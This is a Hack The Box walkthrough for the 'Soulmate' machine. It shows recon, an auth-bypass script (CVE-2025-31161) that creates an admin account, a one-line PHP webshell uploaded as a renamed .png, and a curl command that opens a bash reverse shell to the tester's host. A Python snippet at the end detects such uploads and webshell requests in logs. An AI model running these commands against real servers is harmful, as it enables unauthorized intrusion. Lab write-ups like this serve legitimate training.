Soulmate — Hack The Box
Platform: Linux
IP: 10.129.229.162
Difficulty: Easy
Author: NoSec
Editing /etc/hosts
sudo sh -c 'echo "10.129.229.162 soulmate.htb ftp.soulmate.htb" >> /etc/hosts'
Recon – Service enumeration
Nmap
nmap -sVC soulmate.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Soulmate - Find Your Perfect Match
|_http-server-header: nginx/1.18.0 (Ubuntu)
Foothold – Web vuln → RCE
A new vhost was discovered: ftp.soulmate.htb
This was vulnerable to CVE-2025-31161 (auth bypass).
We can create a new admin user:
python3 cve-2025-31161.py \
--target_host ftp.soulmate.htb \
--port 80 \
--target_user admin \
--new_user nosec \
--password 'Crush@123!'
On the admin panel, uploaded .png files can be renamed to .php → classic webshell upload.
Webshell upload
echo '<?php if(isset($_REQUEST["cmd"])) system($_REQUEST["cmd"]); ?>' > shell.png
Upload → rename → shell.php.
Test:
http://soulmate.htb/assets/images/profiles/shell.php?cmd=id
Reverse shell
rlwrap nc -lvnp 9001
curl "http://soulmate.htb/assets/images/profiles/shell.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/10.10.14.81/9001%200%3E%261'"
✅ www-data shell obtained.
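A defender's view of the upload-and-rename step above, as an added example that is not part of the original writeup: the check a file manager should apply on both upload and rename, plus a scan of nginx access logs for script requests under the image directory. The upload path comes from the test URL above; the function names, extension list and log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: user uploads are served from this path (taken from the writeup's URL).
UPLOAD_PREFIX = "/assets/images/profiles/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# nginx "combined" log format: ip - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def audit_upload(filename, data):
    """Return reasons to reject an uploaded or renamed 'image' (empty list = ok)."""
    reasons = []
    if not filename.lower().endswith(".png"):
        reasons.append("extension not allowed")
    if not data.startswith(PNG_MAGIC):
        reasons.append("content is not a PNG")
    if b"<?php" in data:  # heuristic: PHP open tag inside a supposed image
        reasons.append("contains PHP open tag")
    return reasons

def script_hits_in_uploads(log_lines):
    """Return (client_ip, path, status) for script requests inside the upload dir."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        path = unquote(urlsplit(target).path)
        if path.startswith(UPLOAD_PREFIX) and SCRIPT_EXT.search(path):
            hits.append((ip, path, int(status)))
    return hits

# Constructed sample log lines (not captured from the box).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /assets/images/profiles/a.png HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2025:10:00:05 +0000] "GET /assets/images/profiles/shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.0"',
]

if __name__ == "__main__":
    print(audit_upload("shell.php", b'<?php system($_REQUEST["cmd"]); ?>'))
    print(script_hits_in_uploads(SAMPLE_LOG))
```

A 200 response to a script path under an image directory means the server executed or served it, so the durable fix is to stop the web server from handing that directory to the PHP interpreter at all.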